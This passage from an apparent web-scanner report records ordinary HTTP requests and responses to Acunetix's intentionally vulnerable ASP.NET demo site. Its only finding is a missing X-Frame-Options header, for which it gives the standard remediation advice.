          GET http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=3
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:20 GMT
          Content-Length: 17827
          
          
          Response body (17827 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8+aGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+QWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A+ICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZC
wgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>11/8/2005 11:37:35 AM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p>During the beta phase, builds are released frequently,                            therefore it is not recommended that the same beta version                            is used for more than 30 days. To beta-test beyond 30                            days, users should install the latest beta version or,                            if available, use the release version.</p>                           <p><strong>About Acunetix Web Vulnerability Scanner</strong><br />                           Acunetix Web Vulnerability Scanner, a unique web application                            scanning product that makes securing one&rsquo;s website                            easier than ever. Acunetix Web Vulnerability Scanner                            is an automated web application security testing tool                            that crawls an entire website and attacks it so as to                            identify potential weaknesses before hackers do. Further                            information is available <a href=https://www.acunetix.com/vulnerability-scanner/>here</a>.</p>                           <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=3">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site. If you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET), use SAMEORIGIN; if you never expect the page to be framed, use DENY. Alternatively, consider implementing Content Security Policy's "frame-ancestors" directive.

        13. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=0 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 22752
          
          
          Response body (22752 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=0" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="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" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). 
This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. 
It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a 
href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a 